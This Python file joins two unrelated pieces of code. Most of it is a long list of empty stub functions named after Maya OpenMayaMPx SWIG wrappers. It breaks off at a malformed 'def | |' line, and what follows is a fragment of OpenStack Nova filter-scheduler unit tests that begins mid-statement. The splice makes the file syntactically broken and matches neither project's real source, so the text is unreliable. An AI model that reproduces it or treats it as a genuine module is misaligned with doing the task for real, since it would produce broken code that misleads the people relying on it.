def MPxCacheFormat_readHeader(*args, **kwargs):
pass
def MPxMayaAsciiFilter_writesSelectNode(*args, **kwargs):
pass
def MPxEmitterNode_getRate(*args, **kwargs):
pass
def MPxCacheFormat_swigregister(*args, **kwargs):
pass
def MPxFluidEmitterNode_swigregister(*args, **kwargs):
pass
def MPxDeformerNode_type(*args, **kwargs):
pass
def MPxCameraSet_swigregister(*args, **kwargs):
pass
def MPxSurfaceShape_mControlValueY_set(*args, **kwargs):
pass
def MPxTransform_shear_get(*args, **kwargs):
pass
def MPxNode_compute(*args, **kwargs):
pass
def MPxEmitterNode_mRandStateZ_set(*args, **kwargs):
pass
def MPxTransform_minTransYLimitEnable_get(*args, **kwargs):
pass
def MPxTransform_rotatePivotY_set(*args, **kwargs):
pass
def MPxControlCommand__control(*args, **kwargs):
pass
def MPxTransform_shearXY_get(*args, **kwargs):
pass
def MPxAssembly_activateRep(*args, **kwargs):
pass
def new_MPxLocatorNode(*args, **kwargs):
pass
def MPxTransformationMatrix_shear(*args, **kwargs):
pass
def MPxFluidEmitterNode_mFluidColorR_set(*args, **kwargs):
pass
def MPxAssembly_addAddAttrEdit(*args, **kwargs):
pass
def MPxSurfaceShapeUI_surfaceShapeUI(*args, **kwargs):
pass
def MExternalContentInfoTable_getInfoByKey(*args, **kwargs):
pass
def MPxMotionPathNode_orientationMarkerTime_set(*args, **kwargs):
pass
def new_MPxGeometryData(*args, **kwargs):
pass
def MPxManipulatorNode_doMove(*args, **kwargs):
pass
def MPxGeometryIterator_currentPoint(*args, **kwargs):
pass
def MPxTransform_displayHandle_set(*args, **kwargs):
pass
def MPxPolyTweakUVCommand_parseSyntax(*args, **kwargs):
pass
def MPxTransform_nodeBoundingBox_set(*args, **kwargs):
pass
def MPxTransform_isTemplated_get(*args, **kwargs):
pass
def MPxSelectionContext_processNumericalInput(*args, **kwargs):
pass
def MPxHardwareShader_renderSwatchImage(*args, **kwargs):
pass
def MPx3dModelView_numDormantColors(*args, **kwargs):
pass
def MPx3dModelView_setLightingMode(*args, **kwargs):
pass
def MPxImagePlane_alreadyPremult_get(*args, **kwargs):
pass
def MPxSurfaceShape_nodeBoundingBoxMinY_set(*args, **kwargs):
pass
def MPxEmitterNode_hasValidEmission2dTexture(*args, **kwargs):
pass
def MPxMayaAsciiFilter_writesRequirements(*args, **kwargs):
pass
def MPxGeometryFilter_groupId_get(*args, **kwargs):
pass
def MPxTransform_minTransLimitEnable_get(*args, **kwargs):
pass
def MPxTransform_minRotXLimitEnable_get(*args, **kwargs):
pass
def MPxSkinCluster_weightList_get(*args, **kwargs):
pass
def MFnPlugin_registerModelEditorCommand(*args, **kwargs):
pass
def MPxCameraSet_cameraLayer_get(*args, **kwargs):
pass
def disown_MPxSurfaceShape(*args, **kwargs):
pass
def MPxLocatorNode_isTemplated_get(*args, **kwargs):
pass
def MPxEmitterNode_mOwnerVelData_get(*args, **kwargs):
pass
def MPxSurfaceShape_getShapeSelectionMask(*args, **kwargs):
pass
def MPxFieldNode_mMagnitude_get(*args, **kwargs):
pass
def MPxTransform_minRotYLimit_get(*args, **kwargs):
pass
def MFnPlugin_swiginit(*args, **kwargs):
pass
def MPxHardwareShader_outColorG_set(*args, **kwargs):
pass
def MPxTransform_minRotLimitEnable_set(*args, **kwargs):
pass
def MPxLocatorNode_closestPoint(*args, **kwargs):
pass
def MPxRepresentation_swigregister(*args, **kwargs):
pass
def MPxLocatorNode_nodeBoundingBoxMinY_set(*args, **kwargs):
pass
def disown_MPxRepresentation(*args, **kwargs):
pass
def MPxManipContainer_addMPxManipulatorNode(*args, **kwargs):
pass
def MPxTransform_transformationMatrixPtr(*args, **kwargs):
pass
def MPxMotionPathNode_frontTwist_get(*args, **kwargs):
pass
def MPxMotionPathNode_worldUpVector_set(*args, **kwargs):
pass
def disown_MPxManipulatorNode(*args, **kwargs):
pass
def delete_MPxGeometryIterator(*args, **kwargs):
pass
def MPxMotionPathNode_zCoordinate_set(*args, **kwargs):
pass
def MPxImageFile_glLoad(*args, **kwargs):
pass
def MPxTransform_nodeBoundingBoxMinZ_set(*args, **kwargs):
pass
def MPxImagePlane_coverageOrigin_set(*args, **kwargs):
pass
def MPxTransform_rotateQuaternionY_get(*args, **kwargs):
pass
def MPxHardwareShader_render(*args, **kwargs):
pass
def MaterialInputData_specular_set(*args, **kwargs):
pass
def MPxNode_setExistWithoutInConnections(*args, **kwargs):
pass
def MPxBakeEngine_swiginit(*args, **kwargs):
pass
def delete_MPxParticleAttributeMapperNode(*args, **kwargs):
pass
def MPxSurfaceShapeUI_getDrawRequests(*args, **kwargs):
pass
def disown_MPxHwShaderNode(*args, **kwargs):
pass
def MPxTransform_renderLayerColor_get(*args, **kwargs):
pass
def MPx3dModelView_viewSelectedPrefix(*args, **kwargs):
pass
def MPxEmitterNode_mRate_get(*args, **kwargs):
pass
def disown_MPxImagePlane(*args, **kwargs):
pass
def MPx3dModelView_swigregister(*args, **kwargs):
pass
def MPxMayaAsciiFilter_swigregister(*args, **kwargs):
pass
def disown_MPxObjectSet(*args, **kwargs):
pass
def MPxBlendShape_weight_set(*args, **kwargs):
pass
def MPxIkSolverNode_supportJointLimits(*args, **kwargs):
pass
def MPxSurfaceShape_createFullVertexGroup(*args, **kwargs):
pass
def MPxUITableControl_clearSelection(*args, **kwargs):
pass
def MPxSurfaceShape_match(*args, **kwargs):
pass
def MPxHwShaderNode_outMatteOpacityR_set(*args, **kwargs):
pass
def MPxFluidEmitterNode_mFluidDensityEmission_set(*args, **kwargs):
pass
def MPxManipulatorNode_dependentPlugsReset(*args, **kwargs):
pass
def MPxTransform_maxRotZLimitEnable_set(*args, **kwargs):
pass
def MPxEmitterNode_resetRandomState(*args, **kwargs):
pass
def MPxTransformationMatrix_typeId(*args, **kwargs):
pass
def MPxTransform__dirtyRotation(*args, **kwargs):
pass
def MPxRenderPassImpl_frameBufferSemantic(*args, **kwargs):
pass
def MPxMotionPathNode_getVectors(*args, **kwargs):
pass
def MPxImagePlane_useFrameExtension_get(*args, **kwargs):
pass
def MPxTransform_overrideDisplayType_set(*args, **kwargs):
pass
def MPxParticleAttributeMapperNode_computeNodeColor_set(*args, **kwargs):
pass
def disown_MPxPolyTweakUVInteractiveCommand(*args, **kwargs):
pass
def new_MPxComponentShape(*args, **kwargs):
pass
def MPxMaterialInformation_fInstance_get(*args, **kwargs):
pass
def MPxNode_className(*args, **kwargs):
pass
def MPxCacheFormat_readIntArray(*args, **kwargs):
pass
def MPxTransform_boundingBoxCenterZ_get(*args, **kwargs):
pass
def MPxGeometryFilter_groupId_set(*args, **kwargs):
pass
def MPxSkinCluster_weightValue(*args, **kwargs):
pass
def new_MExternalContentInfoTable(*args, **kwargs):
pass
def MPxTransform_applyRotatePivotLocks(*args, **kwargs):
pass
def MPxMaterialInformation_useMaterialAsTexture(*args, **kwargs):
pass
def MPxTransform_rotateQuaternionY_set(*args, **kwargs):
pass
def MPxAssembly_updateRepNamespace(*args, **kwargs):
pass
def MPxManipContainer_plugToManipConversion(*args, **kwargs):
pass
def MPxTransformationMatrix_rotation(*args, **kwargs):
pass
def MPxConstraint_enableRestPosition_get(*args, **kwargs):
pass
def MPxConstraintCommand_worldUpMatrixAttribute(*args, **kwargs):
pass
def MPxHwShaderNode_outGlowColorR_get(*args, **kwargs):
pass
def delete_MPxFileTranslator(*args, **kwargs):
pass
def MPxAssembly_setInstancePtr(*args, **kwargs):
pass
def MPxTransform_minScaleLimitEnable_set(*args, **kwargs):
pass
def MPxSurfaceShape_instObjGroups_get(*args, **kwargs):
pass
def MPxImagePlane_centerZ_set(*args, **kwargs):
pass
def MPxManipContainer_addStateManip(*args, **kwargs):
pass
def MPxHwShaderNode_normalsPerVertex(*args, **kwargs):
pass
def MPxTransform_getScalePivotTranslation(*args, **kwargs):
pass
def MPxTransform_applyScaleLocksPivot(*args, **kwargs):
pass
def MPxComponentShape_swiginit(*args, **kwargs):
pass
def MPxLocatorNode_underWorldObject_get(*args, **kwargs):
pass
def MPxSelectionContext_abortAction(*args, **kwargs):
pass
def MPxTransform_scale_set(*args, **kwargs):
pass
def MPx3dModelView_okForMultipleDraw(*args, **kwargs):
pass
def MPx3dModelView_displayAxisOn(*args, **kwargs):
pass
def MPxHwShaderNode_outMatteOpacityG_set(*args, **kwargs):
pass
def MPxImagePlane_centerY_get(*args, **kwargs):
pass
def MPxCommand_syntax(*args, **kwargs):
pass
def new_MPxMayaAsciiFilterOutput(*args, **kwargs):
pass
def delete_MPxGeometryFilter(*args, **kwargs):
pass
def MPxSpringNode_type(*args, **kwargs):
pass
def MPxCameraSet_sceneData_get(*args, **kwargs):
pass
def MPxBlendShape_inputTargetGroup_get(*args, **kwargs):
pass
def MPxTransform_parentMatrix_set(*args, **kwargs):
pass
def MPxTransform_shearXY_set(*args, **kwargs):
pass
def MPxNode_shouldSave(*args, **kwargs):
pass
def MPxNode_type(*args, **kwargs):
pass
def MPxTransform_rotatePivotTranslate_set(*args, **kwargs):
pass
def MPxControlCommand_className(*args, **kwargs):
pass
def MPx3dModelView_setDisplayAxisAtOrigin(*args, **kwargs):
pass
def delete_MPxToolCommand(*args, **kwargs):
pass
def MPxConstraintCommand_connectTarget(*args, **kwargs):
pass
def MPxFileTranslator_writer(*args, **kwargs):
pass
def MPxMotionPathNode_normal_set(*args, **kwargs):
pass
def MFnPlugin_registerIkSolver(*args, **kwargs):
pass
def MPxGeometryData_updateCompleteVertexGroup(*args, **kwargs):
pass
def MPxGeometryIterator_setObject(*args, **kwargs):
pass
def delete_MFnPlugin(*args, **kwargs):
pass
def MPxTransform_displayRotatePivot_set(*args, **kwargs):
pass
def MPxHwShaderNode_hasTransparency(*args, **kwargs):
pass
def disown_MPxPolyTweakUVCommand(*args, **kwargs):
pass
def MPxTransform_nodeBoundingBoxMinX_set(*args, **kwargs):
pass
def new_MPxFieldNode(*args, **kwargs):
pass
def MPxFieldNode_mInputPPData_set(*args, **kwargs):
pass
def new_MPxMidiInputDevice(*args, **kwargs):
pass
def MPxTransform_objectGroupColor_get(*args, **kwargs):
pass
def MPx3dModelView_userDefinedColorIndex(*args, **kwargs):
pass
def MPx3dModelView_fogSource(*args, **kwargs):
pass
def MFnPlugin_registerRenderPassImpl(*args, **kwargs):
pass
def MPxSurfaceShape_worldInverseMatrix_set(*args, **kwargs):
pass
def MPxImagePlane_colorOffsetR_get(*args, **kwargs):
pass
def MPx3dModelView_customDrawEnabled(*args, **kwargs):
pass
def MPxCommand_displayError(*args, **kwargs):
pass
def MPxMayaAsciiFilter_writesSetAttr(*args, **kwargs):
pass
def MPxObjectSet_edgesOnlySet_set(*args, **kwargs):
pass
def MPxIkSolverNode_type(*args, **kwargs):
pass
def MPxSurfaceShape_renderGroupComponentType(*args, **kwargs):
pass
def MPxIkSolverNode_toSolverSpace(*args, **kwargs):
pass
def MPxEmitterNode_mEmitterType_get(*args, **kwargs):
pass
def MFnPlugin_registerCacheFormat(*args, **kwargs):
pass
def MPxTransform_scalePivotTranslateX_get(*args, **kwargs):
pass
def MPxNode_postEvaluation(*args, **kwargs):
pass
def MPxManipulatorNode_doRelease(*args, **kwargs):
pass
def MPxTransform_minRotYLimitEnable_get(*args, **kwargs):
pass
def MPxLocatorNode_localPosition_set(*args, **kwargs):
pass
def MPxTransformationMatrix_baseTransformationMatrixId_set(*args, **kwargs):
pass
def MPxFluidEmitterNode_mEmitFluidColor_set(*args, **kwargs):
pass
def MPxPolyTweakUVInteractiveCommand_doIt(*args, **kwargs):
pass
def MPxManipContainer_addToManipConnectTable(*args, **kwargs):
pass
def MPxTransform_computeLocalTransformation(*args, **kwargs):
pass
def MPxManipulatorNode_addPointValue(*args, **kwargs):
pass
def MPxUITableControl_setNumberOfColumns(*args, **kwargs):
pass
def MPxUIControl_className(*args, **kwargs):
pass
def MPxImagePlane_coverageOriginX_set(*args, **kwargs):
pass
def MPxPolyTweakUVInteractiveCommand_cancel(*args, **kwargs):
pass
def MPxTransform_rotateQuaternionZ_set(*args, **kwargs):
pass
def MPxHardwareShader_getHardwareShaderPtr(*args, **kwargs):
pass
def new_MaterialInputData(*args, **kwargs):
pass
def MPxCacheFormat_writeTime(*args, **kwargs):
pass
def MPxCommand_getCurrentResult(*args, **kwargs):
pass
def MPxFieldNode_mInputVelocities_set(*args, **kwargs):
pass
def delete_MPxSkinCluster(*args, **kwargs):
pass
def MPxSurfaceShapeUI_snap(*args, **kwargs):
pass
def MPxTransform_overrideTexturing_get(*args, **kwargs):
pass
def MPx3dModelView_setViewSelected(*args, **kwargs):
pass
def MPxContext_toolOnSetup(*args, **kwargs):
pass
def delete_MPxObjectSet(*args, **kwargs):
pass
def disown_MPxContext(*args, **kwargs):
pass
def MPxHwShaderNode_outColorR_set(*args, **kwargs):
pass
def MPxTransformationMatrix_transformBy(*args, **kwargs):
pass
def MPxMaterialInformation_computeMaterial(*args, **kwargs):
pass
def MPxSurfaceShape_hasActiveComponents(*args, **kwargs):
pass
def MPxAnimCurveInterpolator_typeName(*args, **kwargs):
pass
def MPxConstraintCommand__syntax(*args, **kwargs):
pass
def MPxFileResolver_resolveURIWithContext(*args, **kwargs):
pass
def MPxHardwareShader_outColorB_get(*args, **kwargs):
pass
def MPxTransform_minScaleXLimit_set(*args, **kwargs):
pass
def MPxFluidEmitterNode_mFluidDropoff_get(*args, **kwargs):
pass
def MPxTransformationMatrix___ne__(*args, **kwargs):
pass
def MPxTransform_getRotation(*args, **kwargs):
pass
def MPxTransform__dirtyScalePivot(*args, **kwargs):
pass
def MPxMotionPathNode_updateOrientationMarkers_get(*args, **kwargs):
pass
def delete_MPxUITableControl(*args, **kwargs):
pass
def MPxImagePlane_frameExtension_set(*args, **kwargs):
pass
def MPx3dModelView_getCamera(*args, **kwargs):
pass
def MPxImagePlane_colorGainG_get(*args, **kwargs):
pass
def MPxComponentShape_localShapeInAttr(*args, **kwargs):
pass
def MPxTransform_overrideLevelOfDetail_get(*args, **kwargs):
pass
def MPxMaterialInformation_swiginit(*args, **kwargs):
pass
def MPxEmitterNode_getOwnerShape(*args, **kwargs):
pass
def MPxCacheFormat_readInt32(*args, **kwargs):
pass
def MPxGeometryFilter_envelope_get(*args, **kwargs):
pass
def MPxTransform_identification_set(*args, **kwargs):
pass
def MPxTransform_rotateOrder_get(*args, **kwargs):
pass
def MFnPlugin_removeMenuItem(*args, **kwargs):
pass
def MPxNode_postConstructor(*args, **kwargs):
pass
def MPxTransform_maxTransXLimit_set(*args, **kwargs):
pass
def MPxContext_setImage(*args, **kwargs):
pass
def MPxContextCommand_swiginit(*args, **kwargs):
pass
def MPxManipulatorNode_setVectorValue(*args, **kwargs):
pass
def MPxAssembly_supportsMemberChanges(*args, **kwargs):
pass
def MPxManipContainer_className(*args, **kwargs):
pass
def MPxTransformationMatrix_rotateBy(*args, **kwargs):
pass
def MPxTexContext_portToView(*args, **kwargs):
pass
def MPxFluidEmitterNode_compute(*args, **kwargs):
pass
def MPxConstraintCommand_offsetAttribute(*args, **kwargs):
pass
def new_MPxFileTranslator(*args, **kwargs):
pass
def MPxMotionPathNode_sideTwist_get(*args, **kwargs):
pass
def MPxLocatorNode_nodeBoundingBoxSizeZ_set(*args, **kwargs):
pass
def MPxMayaAsciiFilter_swiginit(*args, **kwargs):
pass
def MPxEmitterNode_mDeltaTime_get(*args, **kwargs):
pass
def MPxTransform_selectHandle_set(*args, **kwargs):
pass
def MPxLocatorNode_useObjectColor_get(*args, **kwargs):
pass
def MPxTransform_setRotatePivot(*args, **kwargs):
pass
def MPxTransform_checkAndSetTranslation(*args, **kwargs):
pass
def MPxSelectionContext_addManipulator(*args, **kwargs):
pass
def MPx3dModelView_destroyOnPanelDestruction(*args, **kwargs):
pass
def MPx3dModelView_displayCameraAnnotationOn(*args, **kwargs):
pass
def MPxImagePlane_shadingSamplesOverride_set(*args, **kwargs):
pass
def MPx3dModelView_setWireframeOnShaded(*args, **kwargs):
pass
def MPxSurfaceShape_parentMatrix_set(*args, **kwargs):
pass
def MPxHardwareShader_findResource(*args, **kwargs):
pass
def MPxImagePlane_width_get(*args, **kwargs):
pass
def delete_MPxMidiInputDevice(*args, **kwargs):
pass
def MPxNode_message_set(*args, **kwargs):
pass
def MPxGeometryFilter_accessoryNodeSetup(*args, **kwargs):
pass
def MPxSpringNode_mEnd1Weight_set(*args, **kwargs):
pass
def MFnPlugin_deregisterRenderPassImpl(*args, **kwargs):
pass
def new_MPxHwShaderNode(*args, **kwargs):
pass
def MPxGlBuffer_bindFbo(*args, **kwargs):
pass
def MPxManipulatorNode_connectToDependNode(*args, **kwargs):
pass
def MPxTransform_shearYZ_set(*args, **kwargs):
pass
def MPxNode_getExternalContent(*args, **kwargs):
pass
def MPxTransform_rotatePivotTranslateY_get(*args, **kwargs):
pass
def delete_MPxDragAndDropBehavior(*args, **kwargs):
pass
def MPxTransformationMatrix_setScalePivot(*args, **kwargs):
pass
def MPxLocatorNode_localScaleY_set(*args, **kwargs):
pass
def MPxRepresentation_inactivate(*args, **kwargs):
pass
def MPxTransformationMatrix_swigregister(*args, **kwargs):
pass
def disown_MPxConstraintCommand(*args, **kwargs):
pass
def MExternalContentLocationTable_length(*args, **kwargs):
pass
def MPxMotionPathNode_inverseFront_get(*args, **kwargs):
pass
def MPxGeometryData_smartCopy(*args, **kwargs):
pass
def MPxMotionPathNode_allCoordinates_set(*args, **kwargs):
pass
def disown_MPxUITableControl(*args, **kwargs):
pass
def MPxGeometryIterator_className(*args, **kwargs):
pass
def MPxTransform_dynamics_get(*args, **kwargs):
pass
def MaterialInputData_shininess_set(*args, **kwargs):
pass
def MPxImagePlane_colorOffsetB_set(*args, **kwargs):
pass
def MPxTransform_nodeBoundingBoxMinZ_get(*args, **kwargs):
pass
def MPxTransform_worldMatrix_get(*args, **kwargs):
pass
def MPxTransform_useObjectColor_set(*args, **kwargs):
pass
def MPx3dModelView_backgroundColor(*args, **kwargs):
pass
def MPx3dModelView_fogDensity(*args, **kwargs):
pass
def MPxSurfaceShape_instObjGroups_set(*args, **kwargs):
pass
def MPxImagePlane_depthOversample_set(*args, **kwargs):
pass
def MPx3dModelView_requestOkForDraw(*args, **kwargs):
pass
def MPxCommand_clearResult(*args, **kwargs):
pass
def MPxObjectSet_editPointsOnlySet_get(*args, **kwargs):
pass
def MPxMidiInputDevice_nameButtons(*args, **kwargs):
pass
def MPxEditData__getStringValue(*args, **kwargs):
pass
def MPxIkSolverNode_postSolve(*args, **kwargs):
pass
def MPxIkSolverNode_create(*args, **kwargs):
pass
def MFnPlugin_addMenuItem(*args, **kwargs):
pass
def MPxAttributePatternFactory_swiginit(*args, **kwargs):
pass
def MPxTransform_maxRotXLimit_get(*args, **kwargs):
pass
def MPxTransform_scalePivotTranslateY_set(*args, **kwargs):
pass
def MPxManipulatorNode_getDoubleValue(*args, **kwargs):
pass
def MPxLocatorNode_localPositionY_get(*args, **kwargs):
pass
def MPxHardwareShader_type(*args, **kwargs):
pass
def new_MPxGlBuffer(*args, **kwargs):
pass
def MPxManipContainer_doRelease(*args, **kwargs):
pass
def MPxPolyTrg_isAbstractClass(*args, **kwargs):
pass
def MPxLocatorNode_instObjGroups_set(*args, **kwargs):
pass
def MPxTransform_limitValue(*args, **kwargs):
pass
def MPxTransform_setRotationOrder(*args, **kwargs):
pass
def MPxNode_internalArrayCount(*args, **kwargs):
pass
def MPxGeometryIterator_iteratorCount(*args, **kwargs):
pass
def MPxUITableControl_labelString(*args, **kwargs):
pass
def delete_MPxImagePlane(*args, **kwargs):
pass
def MPxEmitterNode_mMaxDistance_get(*args, **kwargs):
pass
def MPxImagePlane_sourceTexture_get(*args, **kwargs):
pass
def MPxTransform_rotationInterpolation_set(*args, **kwargs):
pass
def MPxData_copy(*args, **kwargs):
pass
def MaterialInputData_swiginit(*args, **kwargs):
pass
def MPxCacheFormat_readNextTime(*args, **kwargs):
pass
def MPxSurfaceShape_matrix_get(*args, **kwargs):
pass
def MPxParticleAttributeMapperNode_vCoordPP_get(*args, **kwargs):
pass
def MPxSurfaceShape_isTemplated_get(*args, **kwargs):
pass
def MPxTransform_ghosting_set(*args, **kwargs):
pass
def MPxTransform_overrideEnabled_get(*args, **kwargs):
pass
def MPxTransform_translateY_get(*args, **kwargs):
pass
def | |
= [
mock.call(ctx.elevated.return_value, self.placement_client,
spec_obj, uuids.instance0,
alloc_reqs_by_rp_uuid[uuids.cn2][0],
allocation_request_version=None),
mock.call(ctx.elevated.return_value, self.placement_client,
spec_obj, uuids.instance1,
alloc_reqs_by_rp_uuid[uuids.cn1][0],
allocation_request_version=None),
]
mock_claim.assert_has_calls(claim_calls)
# Check that _get_sorted_hosts() is called twice and that the
# second time, we pass it the hosts that were returned from
# _get_sorted_hosts() the first time
sorted_host_calls = [
mock.call(spec_obj, all_host_states, 0),
mock.call(spec_obj, [hs2, hs1], 1),
]
mock_get_hosts.assert_has_calls(sorted_host_calls)
# The instance group object should have both host1 and host2 in its
# instance group hosts list and there should not be any "changes" to
# save in the instance group object
self.assertEqual(['host2', 'host1'], ig.hosts)
self.assertEqual({}, ig.obj_get_changes())
@mock.patch('random.choice', side_effect=lambda x: x[1])
@mock.patch('nova.scheduler.host_manager.HostManager.get_weighed_hosts')
@mock.patch('nova.scheduler.host_manager.HostManager.get_filtered_hosts')
def test_get_sorted_hosts(self, mock_filt, mock_weighed, mock_rand):
"""Tests the call that returns a sorted list of hosts by calling the
host manager's filtering and weighing routines
"""
self.flags(host_subset_size=2, group='filter_scheduler')
hs1 = mock.Mock(spec=host_manager.HostState, host='host1',
cell_uuid=uuids.cell1)
hs2 = mock.Mock(spec=host_manager.HostState, host='host2',
cell_uuid=uuids.cell2)
all_host_states = [hs1, hs2]
mock_weighed.return_value = [
weights.WeighedHost(hs1, 1.0), weights.WeighedHost(hs2, 1.0),
]
results = self.driver._get_sorted_hosts(mock.sentinel.spec,
all_host_states, mock.sentinel.index)
mock_filt.assert_called_once_with(all_host_states, mock.sentinel.spec,
mock.sentinel.index)
mock_weighed.assert_called_once_with(mock_filt.return_value,
mock.sentinel.spec)
# We override random.choice() to pick the **second** element of the
# returned weighed hosts list, which is the host state #2. This tests
# the code path that combines the randomly-chosen host with the
# remaining list of weighed host state objects
self.assertEqual([hs2, hs1], results)
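# The behaviour under test, sketched in plain Python (illustrative,
# not the scheduler's actual implementation): one host is picked at
# random from the best `host_subset_size` weighed hosts and the
# remaining hosts follow in their weighed order.
#
#     subset = weighed_hosts[:host_subset_size]
#     chosen = random.choice(subset)
#     ordered = [chosen] + [h for h in weighed_hosts if h is not chosen]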
@mock.patch('random.choice', side_effect=lambda x: x[0])
@mock.patch('nova.scheduler.host_manager.HostManager.get_weighed_hosts')
@mock.patch('nova.scheduler.host_manager.HostManager.get_filtered_hosts')
def test_get_sorted_hosts_subset_less_than_num_weighed(self, mock_filt,
mock_weighed, mock_rand):
"""Tests that when we have >1 weighed hosts but a host subset size of
1, that we always pick the first host in the weighed host
"""
self.flags(host_subset_size=1, group='filter_scheduler')
hs1 = mock.Mock(spec=host_manager.HostState, host='host1',
cell_uuid=uuids.cell1)
hs2 = mock.Mock(spec=host_manager.HostState, host='host2',
cell_uuid=uuids.cell2)
all_host_states = [hs1, hs2]
mock_weighed.return_value = [
weights.WeighedHost(hs1, 1.0), weights.WeighedHost(hs2, 1.0),
]
results = self.driver._get_sorted_hosts(mock.sentinel.spec,
all_host_states, mock.sentinel.index)
mock_filt.assert_called_once_with(all_host_states, mock.sentinel.spec,
mock.sentinel.index)
mock_weighed.assert_called_once_with(mock_filt.return_value,
mock.sentinel.spec)
# We should be randomly selecting only from a list of one host state
mock_rand.assert_called_once_with([hs1])
self.assertEqual([hs1, hs2], results)
@mock.patch('random.choice', side_effect=lambda x: x[0])
@mock.patch('nova.scheduler.host_manager.HostManager.get_weighed_hosts')
@mock.patch('nova.scheduler.host_manager.HostManager.get_filtered_hosts')
def test_get_sorted_hosts_subset_greater_than_num_weighed(self, mock_filt,
mock_weighed, mock_rand):
"""Hosts should still be chosen if host subset size is larger than
number of weighed hosts.
"""
self.flags(host_subset_size=20, group='filter_scheduler')
hs1 = mock.Mock(spec=host_manager.HostState, host='host1',
cell_uuid=uuids.cell1)
hs2 = mock.Mock(spec=host_manager.HostState, host='host2',
cell_uuid=uuids.cell2)
all_host_states = [hs1, hs2]
mock_weighed.return_value = [
weights.WeighedHost(hs1, 1.0), weights.WeighedHost(hs2, 1.0),
]
results = self.driver._get_sorted_hosts(mock.sentinel.spec,
all_host_states, mock.sentinel.index)
mock_filt.assert_called_once_with(all_host_states, mock.sentinel.spec,
mock.sentinel.index)
mock_weighed.assert_called_once_with(mock_filt.return_value,
mock.sentinel.spec)
# We overrode random.choice() to return the first element in the list,
# so even though host_subset_size is greater than the number of weighed
# hosts (2), we simply call random.choice() on the entire set of
# weighed hosts and thus return [hs1, hs2]
self.assertEqual([hs1, hs2], results)
@mock.patch('random.shuffle', side_effect=lambda x: x.reverse())
@mock.patch('nova.scheduler.host_manager.HostManager.get_weighed_hosts')
@mock.patch('nova.scheduler.host_manager.HostManager.get_filtered_hosts')
def test_get_sorted_hosts_shuffle_top_equal(self, mock_filt, mock_weighed,
mock_shuffle):
"""Tests that top best weighed hosts are shuffled when enabled.
"""
self.flags(host_subset_size=1, group='filter_scheduler')
self.flags(shuffle_best_same_weighed_hosts=True,
group='filter_scheduler')
hs1 = mock.Mock(spec=host_manager.HostState, host='host1')
hs2 = mock.Mock(spec=host_manager.HostState, host='host2')
hs3 = mock.Mock(spec=host_manager.HostState, host='host3')
hs4 = mock.Mock(spec=host_manager.HostState, host='host4')
all_host_states = [hs1, hs2, hs3, hs4]
mock_weighed.return_value = [
weights.WeighedHost(hs1, 1.0),
weights.WeighedHost(hs2, 1.0),
weights.WeighedHost(hs3, 0.5),
weights.WeighedHost(hs4, 0.5),
]
results = self.driver._get_sorted_hosts(mock.sentinel.spec,
all_host_states, mock.sentinel.index)
mock_filt.assert_called_once_with(all_host_states, mock.sentinel.spec,
mock.sentinel.index)
mock_weighed.assert_called_once_with(mock_filt.return_value,
mock.sentinel.spec)
# We override random.shuffle() to reverse the list, thus the
# head of the list should become [host#2, host#1]
# (as the host_subset_size is 1) and the tail should stay the same.
self.assertEqual([hs2, hs1, hs3, hs4], results)
def test_cleanup_allocations(self):
instance_uuids = []
# Check we don't do anything if there's no instance UUIDs to cleanup
# allocations for
pc = self.placement_client
self.driver._cleanup_allocations(self.context, instance_uuids)
self.assertFalse(pc.delete_allocation_for_instance.called)
instance_uuids = [uuids.instance1, uuids.instance2]
self.driver._cleanup_allocations(self.context, instance_uuids)
exp_calls = [mock.call(self.context, uuids.instance1),
mock.call(self.context, uuids.instance2)]
pc.delete_allocation_for_instance.assert_has_calls(exp_calls)
def test_add_retry_host(self):
retry = dict(num_attempts=1, hosts=[])
filter_properties = dict(retry=retry)
host = "fakehost"
node = "fakenode"
scheduler_utils._add_retry_host(filter_properties, host, node)
hosts = filter_properties['retry']['hosts']
self.assertEqual(1, len(hosts))
self.assertEqual([host, node], hosts[0])
def test_post_select_populate(self):
# Test addition of certain filter props after a node is selected.
retry = {'hosts': [], 'num_attempts': 1}
filter_properties = {'retry': retry}
selection = objects.Selection(service_host="host", nodename="node",
cell_uuid=uuids.cell)
scheduler_utils.populate_filter_properties(filter_properties,
selection)
self.assertEqual(['host', 'node'],
filter_properties['retry']['hosts'][0])
@mock.patch('nova.scheduler.filter_scheduler.FilterScheduler.'
'_schedule')
def test_select_destinations_match_num_instances(self, mock_schedule):
"""Tests that the select_destinations() method returns the list of
hosts from the _schedule() method when the number of returned hosts
equals the number of instance UUIDs passed in.
"""
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=512,
root_gb=512,
ephemeral_gb=0,
swap=0,
vcpus=1),
project_id=uuids.project_id,
num_instances=1)
mock_schedule.return_value = [[fake_selection]]
dests = self.driver.select_destinations(self.context, spec_obj,
[mock.sentinel.instance_uuid], mock.sentinel.alloc_reqs_by_rp_uuid,
mock.sentinel.p_sums, mock.sentinel.ar_version)
mock_schedule.assert_called_once_with(self.context, spec_obj,
[mock.sentinel.instance_uuid], mock.sentinel.alloc_reqs_by_rp_uuid,
mock.sentinel.p_sums, mock.sentinel.ar_version, False)
self.assertEqual([[fake_selection]], dests)
@mock.patch('nova.scheduler.filter_scheduler.FilterScheduler.'
'_schedule')
def test_select_destinations_for_move_ops(self, mock_schedule):
"""Tests that the select_destinations() method verifies the number of
hosts returned from the _schedule() method against the number of
instance UUIDs passed as a parameter and not against the RequestSpec
num_instances field since the latter could be wrong in case of a move
operation.
"""
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=512,
root_gb=512,
ephemeral_gb=0,
swap=0,
vcpus=1),
project_id=uuids.project_id,
num_instances=2)
mock_schedule.return_value = [[fake_selection]]
dests = self.driver.select_destinations(self.context, spec_obj,
[mock.sentinel.instance_uuid], mock.sentinel.alloc_reqs_by_rp_uuid,
mock.sentinel.p_sums, mock.sentinel.ar_version)
mock_schedule.assert_called_once_with(self.context, spec_obj,
[mock.sentinel.instance_uuid], mock.sentinel.alloc_reqs_by_rp_uuid,
mock.sentinel.p_sums, mock.sentinel.ar_version, False)
self.assertEqual([[fake_selection]], dests)
@mock.patch('nova.scheduler.utils.claim_resources', return_value=True)
@mock.patch('nova.scheduler.filter_scheduler.FilterScheduler.'
'_get_all_host_states')
@mock.patch('nova.scheduler.filter_scheduler.FilterScheduler.'
'_get_sorted_hosts')
def test_schedule_fewer_num_instances(self, mock_get_hosts,
mock_get_all_states, mock_claim):
"""Tests that the _schedule() method properly handles
resetting host state objects and raising NoValidHost when there are not
enough hosts available.
"""
spec_obj = objects.RequestSpec(
num_instances=2,
